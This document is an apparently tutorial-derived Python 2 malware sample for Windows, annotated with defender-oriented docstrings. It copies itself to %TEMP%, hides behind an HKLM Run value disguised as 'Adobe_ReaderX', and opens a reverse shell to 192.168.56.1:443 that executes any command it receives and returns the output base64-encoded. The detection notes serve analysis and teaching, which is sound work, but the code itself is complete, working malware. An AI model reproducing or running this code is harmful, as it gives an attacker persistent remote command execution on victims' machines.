출처: http://www.primalsecurity.net/0xc-python-tutorial-python-malware/
import
sys, base64, os, socket, subprocess
from
_winreg
import
*
def autorun(tempdir, fileName, run):
    """Copy the running file to `tempdir` and register an HKLM autorun value.

    Python 2 / Windows only: the registry calls come from the `_winreg`
    star-import at the top of the file.

    Args:
        tempdir: Destination passed to the shell `copy` command.
        fileName: Path of the file to copy.
        run: Registry sub-key path, opened under HKEY_LOCAL_MACHINE.

    Defender notes (all visible in this function):
        * A new value named 'Adobe_ReaderX' appears under HKLM\\<run>, with
          data pointing at an executable in %TEMP%. A vendor-looking value
          name combined with a temp-directory target is a common hunting
          signal for autorun abuse.
        * The key is reopened with KEY_ALL_ACCESS for the write; on a default
          Windows configuration that presumably needs administrative rights
          for HKLM, so confirm against the host's ACLs.
        * Both `except WindowsError: pass` blocks swallow failures, so the
          sample produces no error output when the registry write is denied.
    """
    # Copy executable to %TEMP%:
    # NOTE(review): the two paths are interpolated unquoted into a shell
    # command line; os.system spawns a command interpreter to run `copy`,
    # which shows up as a child process in process-creation telemetry.
    os.system('copy %s %s' % (fileName, tempdir))
    # Enumerate the values under the autorun key and collect their names
    # (element 0 of each EnumValue result) into `runkey`.
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        # EnumValue raises once the index runs past the last value; that is
        # the loop's only exit.
        pass
    # The membership test looks for 'Adobe ReaderX' (with a space) while the
    # value written below is named 'Adobe_ReaderX' (with an underscore);
    # detections should key on the name that is actually written.
    if 'Adobe ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            # Write failures (e.g. access denied) are silently ignored.
            pass
def shell():
    """Connect out to a hard-coded host and run whatever it sends as commands.

    Opens a TCP connection to 192.168.56.1:443, sends a plaintext banner,
    then loops: each received chunk (up to 1024 bytes) is passed to
    `subprocess.Popen(..., shell=True)` and the combined stdout/stderr is
    returned base64-encoded. The loop ends when the peer sends exactly "quit".

    Defender notes (all visible in this function):
        * The traffic on port 443 is not TLS: the first bytes sent are the
          ASCII banner '[*] Connection Established!', so a protocol/port
          mismatch check or a content match on that banner flags it.
        * Base64 is an encoding, not encryption; command output is
          recoverable from a packet capture by decoding the payloads.
        * Every received command spawns a shell child process of this
          process, which is visible in process-creation logging.
        * 192.168.56.1 is a private (RFC 1918) address; presumably a lab
          host-only network, so confirm before treating it as an indicator.
        * The peer is not authenticated in any way before its input is
          executed.
    """
    #Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    # Plaintext banner sent immediately after connect.
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit":
            break
        # shell=True hands the received bytes to the system command
        # interpreter unmodified.
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        # stdout is read to EOF before stderr is read.
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    """Run the persistence step, then the command channel.

    Passes the literal string '%TEMP%', the script's own path
    (`sys.argv[0]`) and the HKLM Run sub-key path to `autorun`, then calls
    `shell`. The order matters for triage: the file copy and the registry
    write are attempted before any network connection is made.
    """
    # Left unexpanded here; the command interpreter started by os.system in
    # autorun is what would resolve the environment variable.
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    # Non-raw string: none of \M, \W, \C, \R is a recognised escape sequence,
    # so the backslashes are kept literally.
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
# Entry-point guard: main() runs only when the file is executed directly,
# not when it is imported as a module.
if __name__ == "__main__":
    main()